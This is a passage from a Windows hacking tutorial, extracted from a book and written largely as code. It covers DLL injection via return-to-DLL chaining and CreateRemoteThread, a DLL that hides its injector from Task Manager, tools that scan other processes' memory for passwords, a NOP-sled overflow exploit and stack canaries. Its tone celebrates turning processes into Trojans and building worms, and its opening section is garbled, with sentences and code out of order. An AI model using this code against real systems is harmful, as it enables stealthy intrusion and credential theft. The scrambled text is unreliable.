We mean rebasing the DLL.argn arg(n-1) arg(n-2) … … … arg2 arg1 Toward Left in Stack The functions called in a fixed way by operating system. therefore no problem of nonexecutable stack as the shellcode lies in the executable code section of injected DLL) and then redirect the executional control to the injected library. But for simplicity we’ll declare a single function and its prototype will contain all the desired code for hacking and then compile the program as a DLL. In this case the injection vector will be no more than a pile of addresses. it will foil the hack. We can also do it by manually surgery of DLL with the help of hexeditor. Thus redirecting the execution to our declared function address will contain 0x00 at least once as in 0x1000107E the two zeros as shown in bold in preceding address will cause the overflow string termination (strings are terminated where NULL byte is encountered). As shown in figure 147 . This kind of attack is used to chain back to back the libc (c library) functions in Linux.exe. then. but suppose if we force the processor to call the functions from the list provided by us manually then we have to pass a list in the same way like the operating system do. Then we will inject this newly created DLL into the vulnerable process space (DLLs have their own code section. One more thing. is that by default all compiled DLLs are loaded at 0x10000000 in process memory. The first function that is desired to be executed is placed first. the function calls are chained along with their arguments. Thus. We’ll do it with the help of rebase. the return address is placed and then last argument… first argument. To eliminate such a problem we need to change the base address of image of DLL. which we have to cop with. which comes along with visual studio. In windows operating system we can chain the DLL exported functions. In this attack.
….cpp */ #include <iostream> #include <process. Let us code a suitable DLL file inject. F2 addr. Therefore. we will place all the calls in an exportable single function in a DLL and inject this DLL into the vulnerable process’s memory space. The attack plan: The first function we will call here is “LoadLibraryA” exported from “kernel32. First Argument If we have to call just a single function.Func Addr. argarray[0] = "cmd". But. And the functions arguments are provided in a way as listed in figure F1 addr. we need to call many functions. { 148 .dll as it is loaded for each & every process by default. /* inject. …. then we need not to specify any valid return address. F1 arguments F2 arguments But there is a problem yet to be tackled. *argarray[3]. In some places the stack clearing may cause problem as it may clear the parts of injection vector.h> /* place any code to execute inside smackdown function. in this case we have to chain the function calls.exe".dll”. */ __declspec (dllexport) void smackdown(void) char *program. Ret. argarray[1] = "START". Rather.cpp for our attack. Well we need not to load the kernel32. we can place any address here. Last arg. Addr. program = "c:\\windows\\system32\\cmd.
cpp in visual studio and compile it using the following command: C:\Access Denied\Code>CL /LD inject. } Build the inject.reloc B000 .dll File Type: DLL Section contains the following exports for inject.data 2000 .cpp It will create inject.00 version 1 ordinal base 1 number of functions 1 number of names ordinal hint RVA 1 name 0 0000107E ?smackdown@@YAXXZ Summary 3000 .dll containing the attacking function smackdown (). std::cout << "***Created by Xtremers***" << std::endl. NULL). argarray.dll 0 characteristics 4657C0F4 time date stamp Sat May 26 10:39:08 2007 0. Let’s check out the exports of inject. Now we have the DLL file inject. execve(program.dll. Let’s check out the headers of DLL 149 .dll as C:\Access Denied\Code>Dumpbin /exports inject.dll in the same directory.argarray[2] = NULL.text The smackdown will be loaded at an offset 0000107E from the base address of inject.rdata 2000 .
In second technique. We must do something to eliminate these zeros to get rid of null byte problem. open the inject.dll will be loaded at 0x11110000 and the smackdown () will be located at 0x11110000 + 0x0000107E = 0x1111107E Free from null bytes. We can inject the inject.dll with dumpbin output: OPTIONAL HEADER VALUES 11110000 image base The inject.dll will be loaded at 0x10000000 and the smackdown () will be placed at 0x10000000 + 0x0000107E = 0x1000107E But as we discussed earlier the address contains the zeros to form a NULL byte in the string field.dll into vulnerable process space using LoadLibraryA function. But LoadLibraryA () needs the library name to be injected as the only argument and returns the pointer to the base 150 . We can transform the base address 0x10000000 with 0x11110000 and eliminate the null byte. Now we have the DLL prepared.exe as C:\Access Denied\code>rebase -R 0x10000000 -b 0x11110000 inject.dll REBASE: Total Size of mapping 0x00020000 REBASE: Range 0x11110000 -0x11130000 Let’s check the effect on inject.OPTIONAL HEADER VALUES 1000 base of code C000 base of data 10000000 image base The above output shows that the inject. There are two ways first and safe way is to use rebase.dll in hexeditor and edit the hex value 0x00 0x10 at offsets 0x00000116 and 0x00000117 to 0x11 0x11 will do the same.
/* getenvaddr. We can create any environment variable using the following command: set <variable name>=<value> And then execute the process from same command console. which can be used for this purpose. or executing any other process etc. In Linux the same technique is used to leverage the privileges and opening the shell by chaining the setuid () and execl () syscalls.cpp */ #include <iostream> using namespace std. We want to create an environment variable for the inject. { <environment variable name>" << cout << "Usage: getenvaddr { 151 . The environment is the best suit we think.address of loaded DLL in EAX register. char* argv[]) char *ptr. but for example and simplicity for the sake of understanding and compactness).dll.exe. We can code a program utilizing the getenv () function for this purpose. like opening the network sockets or creating and hiding users or downloading any Trojan. The vulnerable process in our case is the same earlier example seconsol. Well friends. if (argc < 2) endl. but we are not going to use it as we are not going to execute anything from the stack. We can use any other string buffer field or the environment variable.dll Now we need the address of the environment variable. But we are interested in opening an interactive command shell (actually we can do anything. we will just inject the DLL and return to the address inside the recently injected DLL as we already know the base address (and don’t need pointer returned in EAX). Let’s do it as C:\Access Denied\code>Set inj=inject. int main (int argc. The problem is how to provide the DLL name to be injected? There are few places in process memory.
instead it returns the address of environment variable in its own environment. We can also load any other system DLLs.dll for the study purpose.dll. } printf ("Environment variable %s does not exists. argv[1].dll and search for the following entry: 152 .\n".exit(1). } ptr = getenv(argv[1]). Or try to search or manually browse the memory. Check out the exports listing for kernel32. The larger the name the same environment variable will be located near the top of the stack. Compile it and execute the above program. The environment addresses depends upon the program names itself. smaller the name means a little down in the stack at higher addresses (stack grows down the memory). ptr). but we have created the inject. First we need the LoadLibraryA address. overflow LoadLibraryA address. But there is a problem. return EXIT_SUCCESS. We need not to place any argument for the smackdown function as we have declared it as of void type for the sake of compactness and portability. return address inside the loaded DLL and then the argument for LoadLibraryA. The structure of our injection vector contains the buffer string. Now we have to create the injection vector. In windows systems. And the getenvaddr program does not provide us the actual address of variable in vulnerable process. if (ptr == NULL) argv[1]). Friends you can read more about injection vector in next section. To find out the actual address of the inj we can debug and then jumping at the address provided by the getenvaddr program and finding the address of inject. the environment also changes the address offsets according to the process’s own structure. else printf ("%s is located at %p\n".
We have created the following injection vector for this purpose: "".exe". which will replace the overflowed return address.exe. we will be discussing more on developing exploits in next section. it is 0x7C800000. Note: Friends. { 153 . argarray [0] = "seconsol". Therefore. The bold hex dump in the middle is the address of LoadLibraryA in little Endian order.dll. execve(program. The smackdown is at 0x1111107E and environment variable inj is at 0x00420BAA. argarray. program = "seconsol. argarray [2] = NULL. NULL). *argarray[3]. Let’s create an exploit that will inject the injection vector into the vulnerable process seconsol. perror("execve"). 0x7C800000 + 0x00001D77 = 0x7C801D77 0x7C801D77 will be the address of LoadLibraryA. char* argv[]) char *program. and last bold hex dump is the address of inj as an argument for LoadLibraryA.cpp */ #include <iostream> #include <process. int main (int argc. /* cinjector. return EXIT_SUCCESS.ordinal hint RVA 578 name 241 00001D77 LoadLibraryA we have the base address of kernel32. argarray [1] = "".h> using namespace std.
154 . we can inject any DLLs found on the system and force the system to do as desired. The most popular technique employs one process to force another process using its process identifier. either in the same directory or in windows or system32 directory. This technique is mostly used in cases where we have to leverage the privileges & some code needs ring0 privileges for its execution. Other techniques for DLL injection attack are there.} Let’s check out its output as C:\access denied\code>cinjector C:\access denied\code>Login failed. with it. we successfully launched the attack.2600] (C) Copyright 1985-2001 Microsoft Corp. Friends.1. to load a DLL & execute some code from that DLL in other process’s address space. Note: If absolute path will not be given then the LoadLibraryA will search the DLL. ***Created by Xtremers*** Microsoft Windows XP [Version 5. C:\access denied\code> Check out the line ***Created by Xtremers***.
LPSECURITY_ATTRIBUTES lpThreadAttributes. Handle hProcess. which executes in the environment and virtual address space of another process. We are going to create such an handle with OpenProcess function. It specifies that whether the child processes can inherit the handle. dwStackSize It defines the initial size of the stack in bytes. Parameters: hProcess A handle to the process in which. SIZE_T dwStackSize. One such API function is CreateRemoteThread. If lpThreadAttributes is null. lpThreadAttributes It is a pointer to SECURITY ATTRIBUTES structure that specifies a security descriptor for the new thread. the thread gets a default security descriptor and the handle cannot be inherited. DWORD lpThreadID The function returns a handle to new thread if succeeded otherwise.dll. HANDLE WINAPI CreateRemoteThread ( __in __in __in __in __in __in ). lpStartAddress A pointer to the application defined function to be executed by the thread. The handle must have the PROCESS_ALL_ACCESS access right. The system rounds this value to the nearest page. If zero. LPTHREAD_START_ROUTINE lpStartAddress. It represents the starting address 155 . returns a null value. You can find CreateRemoteThread in exports list of kernel32. LPVOID lpParameter. This function creates a thread. the thread is to be created.DLL Injection by CreateRemoteThread Microsoft provides several API functions for controlling or affecting the other processes from one process. the new thread uses the default size for the executable.
This problem can be solved by using the VirtualAllocEx and WriteProcessMemory functions. But still the problem is the guessing of the address of the location storing that name. If this parameter is null. In such situation an exception is thrown and the thread terminates.of the thread in the remote process. lpParameter The pointer to the argument passed to the thread function. write the DLL’s name into victim process’s memory space and in CreateRemoteThread function define the start routine to LoadLibraryA and provide it the pointer to the memory location of the DLL’s name in remote memory. The attack plan is like this: grab the process ID of the victim process. other processes cannot access these objects at all and then by creating the thread in that remote process and executing the code in victim processes virtual address space and environment can provide the desired results. If this value is the thread runs immediately after its creation. The name of the DLL can either be written in any variable. We are going to write a block of memory in victim process and obviously get the pointer to the required memory location’s address. Few processes have exclusive access to important objects and structures. dwCreationFlags It is the flags that control the creation of thread. data input or the environment. If the CREATE_SUSPENDED is specified. 156 . lpThreadID the thread is the zero then It is a pointer to a variable that receives the thread identifier. The function must exist in the remote process. the created in suspended state and does not run until ResumeThread function is called. The thread created by CreateRemoteThread has access to all objects that the process owns. This is the important aspect on which the attack is based most of the times. Note: The CreateRemoteThread may also succeed if lpStartAddress points to data section or even if the code is not accessible. the thread identifier is not returned.
// sleep will avoid the 100% resource utilization // find taskmanager window hTaskManager = FindWindow(NULL. "#32770". In earlier example we did all manually.h> DWORD WINAPI Injection(VOID) LVFINDINFO Find. "Windows Task Manager").cpp */ /* Description: Hides a proccess from task manager */ #include "stdafx. hTaskDialog = FindWindowEx(hTaskManager.cpp file: /* taskHider.h" #include <windows.The process ID will be grabbed by CreateToolhelp32Snapshot and Process32First and Process32Next functions. First of all we need to create the DLL.h> #include <commctrl. 157 . NULL. Open the create a “Win32 Dynamic-Link Library” In VC and name the project tHider and write in the following code into the tHider. But the techniques used in this example makes you more powerful and will help you in development of a lot of new concepts.psz = "tInjector. HWND hTaskDialog. // Grab the handle to child window NULL). NULL.flags = LVFI_STRING.exe". // proccess to hide Find. In this way we are going to fully automate the DLL Injection attack. // The process to hide // win handles HWND hTaskManager. while(TRUE) { Sleep(15). The most of the worms and viruses use these techniques for their action. HWND hList. "Processes"). { hList = FindWindowEx(hTaskDialog. we’ll catch’m up in Artificial Life section. WC_LISTVIEW. // Loops grab the CPU. // item index int nItem. Find. it was done to learn how the things can be managed manually.
/* tInjector. This DLL starts execution of DLLMain function as soon as it is loaded into the victim process.exe from Processes tab nItem = ListView_FindItem(hList. LPSTR lpszDllPath). (unsigned long (__stdcall *)(void *))Injection. HINSTANCE hInstance. NULL). HANDLE hProcess = NULL. The tInjector will find the taskmgr. // The function declarations. } return FALSE. 0. nItem). char* argv[]) HANDLE hToken. bool dllInjector(HANDLE hProcess. { 158 .cpp */ #include <iostream> #include <windows. } return TRUE. } BOOL APIENTRY DllMain(HANDLE hModule. &Find).exe and will inject the tHider. 0.dll" using namespace std.h> #include <TlHelp32. int main (int argc. DWORD ul_reason_for_call.// delete process tInjector. LPVOID lpReserved) { if(ul_reason_for_call == DLL_PROCESS_ATTACH) { CreateThread(NULL. } This DLL will be injected into task manager process and will grab and delete the tInjector. -1.h> #define DLLNAME "tHider. Next is the code for tInjector. HANDLE hSnapshot. 0. HANDLE _cdecl processHunter(LPSTR szExeName). ListView_DeleteItem(hList.dll into it.exe process from the process List.
hProcess = NULL.szExeFile. hProcess = processHunter("taskmgr. &Pe)) { do { if (!strcmp(Pe. 159 . // The if (OpenProcessToken(GetCurrentProcess().Attributes = SE_PRIVILEGE_ENABLED. &tknp. NULL). Pe. SE_DEBUG_NAME.dll is default loaded into all processes. CloseHandle(hToken). &tknp. } } Sleep(5). CloseHandle(hProcess). tknp. hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPALL. sizeof(tknp). { { // Save precious cpu-cycles. if (Process32First(hSnapshot. kernel32. hInstance = GetModuleHandle("Kernel32. 0.TOKEN_PRIVILEGES tknp. "Windows Task Manager")) if (!hProcess) { { CloseHandle(hProcess). tknp. &hToken)) { LookupPrivilegeValue(NULL. } } Sleep(20). } HANDLE _cdecl processHunter(LPSTR szExeName) { PROCESSENTRY32 Pe = { sizeof(PROCESSENTRY32) }. TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY. DLLNAME). } while(true) { if (FindWindow(0.exe").Privileges[0].dll").Privileges[0]. NULL.th32ProcessID). return OpenProcess(PROCESS_ALL_ACCESS. } else { dllInjector(hProcess. hProcess = NULL. } return EXIT_SUCCESS. 0). AdjustTokenPrivileges(hToken.Luid).PrivilegeCount = 1. szExeName)) if (!hProcess) true.
(LPTHREAD_START_ROUTINE)GetProcAddress(hmKernel.dll into DLLNAME or copy the tHider.exe and delete its entry. // The Process might not terminate before proper DLL injection (delay of 10 seconds). &Pe)). } return NULL. 0. NULL). MEM_RELEASE).exe.} while (Process32Next(hSnapshot.exe and start task manager by right clicking on taskbar or start menu and click the Processes tab and search the tInjector. WriteProcessMemory(hProcess. PAGE_READWRITE). found!!! Not at all. lpszDllPath. NULL). { HANDLE hThread = CreateRemoteThread(hProcess. int ndllPathLen = lstrlen(lpszDllPath) + 1. LPDWORD lpExitCode = 0. memory to avoid the memory leak. } bool dllInjector(HANDLE hProcess. Execute the tInjetor. the tHider. CloseHandle(hSnapshot). } // Free the Keep in mind either specify the absolute path of DLL tHider. } VirtualFreeEx(hProcess. lpvm. if (hThread != NULL) { dwWaitResult = WaitForSingleObject(hThread. lpvm. lpvm. MEM_COMMIT. 0. 10000). ndllPathLen. 160 . The list will be flickering. ndllPathLen. this is because every time the task manager process list refreshes. HMODULE hmKernel = GetModuleHandle("Kernel32"). return true. 0. CloseHandle(hThread).dll have to search for the tInjector. // string + 1 null byte. LPVOID lpvm = VirtualAllocEx(hProcess.hThread = NULL.dll into windows\system32 directory. NULL. NULL. LPSTR lpszDllPath) DWORD dwWaitResult. "LoadLibraryA"). if (hmKernel == NULL || hProcess == NULL) return false. With this the DLL injection attack is complete and now you have the power to manipulate any process as you want.
161 . instead of placing a huge number of root kit tools into a victim system. just place one DLL that will search for several processes altogether and transform them all into Trojan processes. It is true. We will do this in a worm in Artificial Life section. just place the code which will check the process name and will execute the appropriate functions for that very process. Wow!!! A single DLL can turn whole things around.Think of it.
DWORD nSize. the function proceeds. LPDWORD lpNumberOfBytesRead ). Microsoft has provided a simple solution for it. otherwise. The function documented by Microsoft is as: Bool ReadProcessMemory( HANDLE hProcess. The remote process memory can also be read or copied to a disk file by DLL injection attack by force creating a thread in remote process environment. hProcess Handle to the process whose memory is being read. The process is somewhat tedious. lpBaseAddress Pointer to the base address in specified process to be read. 162 . LPVOID lpBuffer. the function fails. But. This function needs a process handle returned by OpenProcess. If so. lpBuffer Pointer to a buffer that receives the contents from the address space of the specified process. Before data transfer occurs. LPCVOID lpBaseAddress.dll is the shortcut way to read the memory allocated for remote processes. The ReadProcessMemory function ordinal 679 hint 2A6 RVA 00001B50 name ReadProcessMemory exported by kernel32. the system verifies that all data in base address and memory of the specified size is accessible for read access.Reading Remote Process Memory The process memory contains all juicy information for which hackers are preying upon.
.... FALSE. Return Value Nonzero indicates success.txt"..." << endl. let’s use this function in code /* memread.....failed. { 163 .....". buffer. 0) == NULL) cout << "...... the parameter is ignored. char* argv[]) FILE *fp. Zero indicates failure. lpNumberOfBytesRead Pointer to the number of bytes transferred into the specified buffer.cpp */ #include <iostream> #include <windows. HANDLE h = OpenProcess(PROCESS_ALL_ACCESS. If lpNumberOfBytesRead is NULL.. if (!ReadProcessMemory(h. pid)..... memPointer = (char *)0x0012FA00.... cout << "Enter the PID: ". memPointer... bSize.. char buffer[4097]. cout << "Status: . char *memPointer..h> using namespace std. else cout <<". int pid. int main (int argc. cin >> pid." << endl.. int bSize = 4096.nSize Specifies the requested number of bytes to read from the specified process.success.. "a").... Now. fp = fopen("memread..
int main (int argc. char *res. The process id of any process can be retrieved by TASKLIST command. char *mPointer.cpp And execute the program.h> #define SIZE 4096 using namespace std. char buffer[SIZE + 1].for(int i = 0. Let us move on to the next flexible example.cpp */ #include <iostream> #include <windows. Open the memread. fclose(fp). we have modified the memread. } Compile the above code as CL /Gs memread. The execution of memread creates a text file named memread. char* argv[]) FILE *fp. The source code is shown below: /* passfinder. i < bSize. int offset. { 164 . i++) fputc(((char *)buffer)[i]. char *passPointer = NULL. char pass[40]. Before executing this program you need the process id of the remote process whose memory we want to access.txt in same folder. CloseHandle(h). The program accesses the remote process memory and searches the string using the strstr function. return EXIT_SUCCESS. fp).txt in hex editor and check out the contents of memory.cpp program to search for strings or passwords in remote process memory.
.. procID). buffer.unsigned int procID... fp = fopen("passfinder.. /* --------------------. if (!ReadProcessMemory(hInst. else { cout << ". i < SIZE.Success" << endl. cout << "Reading remote process memory .getline(pass... for(int i = 0. goto exit.. pass)) != NULL) goto success..The string search algorithm ends ---------------. FALSE.failed" << endl. cin. mPointer. SIZE. cout << "Enter the password to search: ". 0) == NULL) cout << "...txt".. cout << "Searching the password in remote process memory:" <<endl. 165 . it is optional to dump memory contents in a text file. fp). i <= SIZE.. mPointer = (char *)0x0012FF10. i++) fputc(((char *)buffer)[i]. 39). } // You can remove this FOR loop.Failed" << endl. cin >> procID.. goto exit.*/ for(i=0... "a"). HANDLE hInst = OpenProcess(PROCESS_ALL_ACCESS.*/ cout << ". } /* --------------------. cout << "Enter the PID: ".....The string search algorithm --------------------.". i++) { if (buffer[i] == pass[0]) if((res = strstr(&buffer[i].
passPointer). The passfinder.success: cout << "..exe will calculate the address of user-supplied password in secpass. In case of failure it returns NULL.. } The strstr function takes two string pointers as arguments and returns the address of the memory location where the password is found....&buffer[0]. Execute the secpass.exe using the well familiar example secpass.exe... exit: return EXIT_SUCCESS. 166 ..... passPointer = mPointer + offset. in which it needs to search for the second argument string.exe and when asked for password. Let us check out the working of passfinder. enter “adminpass” as password (without quotation marks) and press enter..success" << endl << endl.The memory address calculation algorithm -------------*/ offset = res . by accessing its memory contents and searching for user-supplied password. /*----------------.. The first argument is the address of string.exe.. printf ("The password is @ position : %08x".
167 . The numbers below PID header are the process ids of respective processes.Now check the process id of secpass.exe using the tasklist command.
exe.exe or a little portion of the password adminpass. Enter the password (adminpass) you entered in secpass. the output of passfinder will be like shown in picture 168 . If successful.exe.Execute the passfinder. And enter the PID of secpass. when asked.
this is the address in secpass. 169 .The address of the password is shown to be 0x0012FF68. The process id shown in next figure is 0x720 in hex format & is equivalent to 1824 in decimal.exe Now start VC++ and click the “Build\Start Debug\Attach to Process…” as shown in figure From list of processes select the secpass as shown in figure.
Now wait for debugger to break the execution.Now when debugger pops up click on Debug menu and then Break. as the color turns to red of most of entities shown in debugger screen 170 .
With all this we have tremendously increase in cracking power. we have increased the power of our debugger. VC++. Now we can search for any string at any memory location in any process. in this case it is: 0x0012FF68 in memory address window.Now type the memory address shown by passfinder. open it from “view\Debug Window\Memory” and press enter. Thus with the help of passfinder. If not shown in your screen. 171 . And check out the memory window contents.
We mean. Remote Exploit: Remote exploits are capable of exploiting the remote systems. well. these exploits work as virtual launch pad as in missile systems. the whole technique is 172 .Developing Exploits The hacker is one who can write his own exploit code. which will automatically exploit the vulnerabilities. IPS (Intrusion Prevention System). Well friends. firewalls. Friends start learning some of the network programming techniques. Several techniques are used to keep the attacks stealth by remote exploits. transporting the exploit code and triggering it. In this discussion we will be creating the virtual missiles and rockets that will be capable of finding the target. friends if you have any knowledge of structure of a missile then it can really help you a lot. Thus. in this discussion we’ll be studying the automation of the exploitation process. But slowly we shall be moving to the ultra advanced technologies used for the stealth (hidden and calm) attacks bypassing the radar technologies such as IDS (Intrusion Detection System). etc. The exploits are of two types 1) Local exploits 2) Remote exploits Local Exploits: Local exploits are used to exploit the local system (the system on which the exploit resides). Don’t think that the exploit codes are of larger sizes. but the compactness is their first feature. instead we will write a script. The remote exploit development needs the knowledge of socket programming. we do not need to manually feed the injection vector. In initial discussions we shall be discussing the simple techniques. The parts of remote exploit are similar in working and architectural logic same as the missile systems. Nowadays the exploits are capable of finding their suitable target systems and then scan them for vulnerabilities and then try to exploit the victim. These exploits have to transmit the injection vector through the networks.
let’s discus the structure of injection vector first. Before proceeding. 173 .analogous to the ultra tech missile & rocket technology.
the attacker does not always know the exact address of the memory location. But remember that at any place if the payload will contain the NULL character (hex 0x00) then the injection vector will be terminated just at that location where the NULL resides. The shellcode is the block of compiled self-sufficient machine instructions. Let’s check out the following figure. which can perform the desired task. So as to overwrite the saved return address on the stack. The payload’s return address is repeated in the injection vector if the buffer size will be of larger size. This is done to align the injection vector so that the desired return address can smoothly intersect the EIP. Hex 0x90) instruction do nothing. Then the shellcode is placed. Therefore a rough guess of memory address at saved return address will lead the processor to land somewhere in the NOP Sled and then the NOP Sled will hand over the execution to shellcode smoothly. We’ll study the shellcode writing techniques in forthcoming sections. The injection vector is responsible for the alignment of the payload or shellcode and the saved return address. A perfectly aligned injection vector needs the knowledge of size of vulnerable buffer. this will get loaded at next return instruction. where the shellcode is residing in vulnerable process memory space. Note: Remember that the NOP (No Operation. NOP SLED SHELLCODE REPEATED RETURN ADDRESS THE Nop Sled is placed in first part of the injection vector. 174 . After the shellcode the address of the memory block in the stack where our payload is residing is placed. but why? Because. just transfers the control to next instruction.The Injection Vector The injection vector is actually a virtual missile.
This is a problem.cpp */ #include <iostream> using namespace std. int main (int argc. Note: In the later sections we will be discussing the developing techniques of the shellcodes for Linux and Windows. Let us frame a vulnerable program /* overflow. cout << "If string buffer will exceed 15 bytes. //-----------------buffer overflow section end-------------system("PAUSE"). then no need to repeat it. just place it at the end of the injection vector or use some other techniques to execute the payload. So if we are directly placing the memory address containing NULL. the string handling functions stop reading the strings where the NULL byte is encountered. Because. "Usage:\n%s <string>". if ( argc < 2) exit(-1). argv[0]). Remember the stack memory addresses contains the Nulls. { 175 . char* argv[]) char name[15]. } { fprintf (stderr." << endl. return EXIT_SUCCESS. } // system("PAUSE"). We will discuss few such techniques in next section. cout << "This is an buffer overflow example. But for simplicity we will be using the same NOP & jump payload. it will cause an overflow. argv[1])." << endl. //----------------buffer overflow section code-------------strcpy (name.
40E0BC. This is done to know the state of the program & stack memory during the execution of the program.dword ptr [edx+4] eax ecx. Like “PAUSE”. Pass it the string “AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA” as argument. And wait for statement “Press any key to continue…”. Just remove the comment characters ‘//’ and save the program as a different copy & compile the program. Insert a breakpoint by right clicking somewhere before the call instruction. which are used in the program.0(or any compiler or debugger you have most compilers have debugger inbuilt). Now press F10 (in visual C++ 6. Well then check a function call. Therefore it is the strcpy () function.8 It handles two memory buffers. These addresses are pointing to the strings. Now open the visual C++ 6.[ebp-10h] ecx 00404440 esp. which takes two arguments 004010F2 8B 55 0C 004010F5 8B 42 04 004010F8 50 004010F9 8D 4D F0 004010FC 51 004010FD E8 3E 33 00 00 00401102 83 C4 08 mov mov push lea push call add edx.Compile this program in CL with /Gs switch as CL /Gs overflow. There are few addresses that look like pointing to the data section. When you see the assembly instructions click on Edit->Goto & type in the address 0x0040107E (a rough address in the beginning of the program) in the text box. and all cout strings. 40E0B4.0) or execute the single 176 . Click on Build->Start Debug->Attach to process. Run the recently compiled program which contains the system (“PAUSE”) before the cout statement.cpp We have placed a commented system (“PAUSE”) function in the code. Now press enter in the main process and wait for the debugger to highlight it.dword ptr [ebp+0Ch] eax. 40E0E0 (there are more but we choose these). select the recently executed program name. Check out these addresses by placing in the memory box address text box and pressing enter. These are 40E0A0.
instruction each time until 00401102 83 C4 08 add esp. By the way eax register contains the same address. 177 . Now we should start the exploit development. Find the string “AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA” and note its beginning address.8 Now check out the stack memory by loading the ESP register value in memory window. In our case it is 0x0012FF70 as in the figure Now we have the required raw material. This is the address we are hunting for.
The definition of execve is as _CRTIMP int __cdecl execve(const char *. arguments[0] = “Command to execute the process (process name)”. Let us use execve in our exploit code as /* expl. const char * const *.cpp */ #include <iostream> #include <process. arguments[2] = “SECOND ARGUMENT”. int main () { 178 . The execve is capable of starting a process and passing it the explicit arguments. arguments[1] = “FIRST ARGUMENT”. const char * const *). The second argument is an array of pointers which is as Char *arguments[n].Exploit Code Development Developing an exploit means inventing the cure for a disease. we can also use execl (). - arguments[n-2] = “(n – 2) ARGUMENT”. The exploit development needs the knowledge of a few system calls. arguments[n-1] = “NULL”. One important function (or syscall) is execve (). It takes the pointer to process name to be started as first argument.h> using namespace std.
arguments. char *arguments[3]. return EXIT_SUCCESS. argone = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\xEB\xF8\x71\xFF\x12". arguments[0] = program. execve(program. 179 . 0)." << endl. arguments[1] = argone. program = "overflow". Wow!!! We created our first exploit. In same way we can develop the local exploits.cout << "Before Injection Vector. will start crawling and will hang up. char *program. char *argone. a working virtual missile. // Injection Vector ends. } Compile this program and execute it. And check the CPU performance in task manager it will be 100% and the system. // Injection Vector. arguments[2] = 0.
180 . Remote exploits differ from local exploits in lots of respects. Well friends the socket programming is the most interesting part of programming so lets enjoy it in next section. Major difference is that the remote exploit has to propagate the payload through networks and strike the target system.Remote Exploit Development The remote exploits are alike real missiles. we should first learn some fundamentals of socket programming. Before indulging into this topic. The remote exploits employ the network programming or socket programming.
Good news hackers. It is due to handshake and the acknowledgement packets in TCP. There are several protocols used in different layers of networks. The server takes no responsibility for data corruption or any missing datagram during the transmission and no connections are formed between the systems. but we are interested in only TCP and UDP. But we must know few properties of different protocols used in networking. But no such facility is in UDP. Both of these protocols work on transport layer of networks. We’ll study different layers of networks in detail in next few sections. TCP is used where every single bit of data is necessarily needed. Or a protocol is a set of instructions. is sent again. we’ll just discus the things necessary to form a connection with remote systems and transport the payload to the remote system and inject the payload into the vulnerable process and finally execute the payload. which works as a mediator between two systems to successfully get networked together. we are needed to utilize just few socket functions in our exploits. which must be obeyed by both systems for a successful connection. The TCP produces huge network traffic than UDP. In TCP reliability means that a proper connection is formed prior to the data transmission and the acknowledgement receipt is transmitted for every chunk of received data and if transmitted data gets corrupted or does not reach its destination then. 181 . We are not going to discus all aspects of all networking protocols. Instead. the above listed whole job will be done by protocols and networking layers for us. while UDP stands for User Datagram Protocol is an unreliable protocol. TCP stands for Transmission Control Protocol is a reliable protocol. A protocol is software.Socket Programming The networked systems utilize the software developed using sockets. Like in encrypted data channels etc and UDP is used where quality doesn’t matter too much like in streaming audio & video etc.
first save and build the project.Note: To compile above exploit.lib in Object/library modules. Separate it from other entries with a blank space and then compile. By ctrl + S and then “F7” and then from Project menu select ‘settings’ and in ‘Link’ tab add wsock32. 182 .
Tricks to Execute Payload Well. we can make our custom payload to execute. 183 . We may be caught in worse situations in the universe with difficulty in executing the payload. Let’s discus some of the tricks used to explode the payload. But the situation is not always same.
Thus when ret is executed the ESP at this point must contain the pointer (address) to the shellcode (our custom code).Return with ret Let’s discus the specialties of ret instruction. That was why in above examples the custom code was getting control after the main () ret was called. The ret instruction causes the address at ESP value to be loaded in EIP. 184 . Thus in result the EIP will point to shellcode and will execute it. Means whatever is at top of the stack will be loaded in EIP register. The ESP always points to the top of the stack and as our custom coded injection vector lies in the stack with the changed saved return address to our own custom code buffer. Its hex equivalent is C3. Remember. leading the buffer at top of the stack. the changed saved return address will get the executional control only after the ret call.
Thus it is clear from figure that if would try to overwrite the EIP by overflowing the buffer string the canary will also get overwritten.Stack Protection The Windows XP and 2003 differ from earlier windows in security mechanisms. which in turn change with time. which makes the stack overflow difficult (but not impossible). Actually the top of the stack is written with a cookie or also called “CANARY”. these two canaries will differ and the error will be generated which will invoke the exception handling mechanism. The overview of the memory is like shown below. The CANARY is an unsigned integer (two bytes) value. The whole process mechanism of this 185 . Thus after buffer overflow. XP and 2003 employ the stack protection. Remember a copy of canary while it is generated is saved in data section and that copy of canary also called the authoritative canary or authoritative cookie. The CANARY is highly random and is generated by enormous XORs among different values.
And it results into the popular “Report this fault to Microsoft” message box. Well this canary acts as a seal on the lock of stack memory. But before shutdown few steps are taken by UnhandledExceptionFilter function. If this seal will not match with the authoritative canary in data section then the UnhandledExceptionFilter function is called. And this function starts the process of shutdown of the process. Actually this function loads the faultrep. which is also commonly known as “Don’t Send Error Report”.dll library and calls the ReportFault function from it. 186 . The CANARY Exception Mechanism The canary is generated as an essential routine every time any module is loaded in memory or any function’s set of arguments are loaded in the stack memory.kind of security is as discussed in next section.
dwHighDateTime ^ ft. unsigned int tmp = 0. unsigned int Canary = 0.The Canary Generator Microsoft Visual Studio imposes the cookie security by default in code. Canary = Canary ^ *ptr. Let’s see how the canary is generated. The cookie is highly random and cannot be predicted easily.cpp */ #include <iostream> #include <windows. tmp = *(ptr + 1) ^ *ptr. Canary = Canary ^ GetCurrentProcessId(). Canary = Canary ^ GetTickCount().dwLowDateTime. //------The XOR section Begins----Canary = ft.h> using namespace std. Actually GS flag in visual studio is by default always turned on (always possess 0000) is responsible for imposing such behavior. QueryPerformanceCounter (&perfcount). } { Now its time to discuss some of ways to crack down the 187 . GetSystemTimeAsFileTime (&ft). /* canarygenerator. Canary). ptr = (unsigned int *) &perfcount. Canary = Canary ^ GetCurrentThreadId(). int main (int argc. return EXIT_SUCCESS. printf ("Generated Canary : %08x\n". system("PAUSE"). char* argv[]) FILETIME ft. LARGE_INTEGER perfcount. unsigned int *ptr = 0.
canary security. 188 .
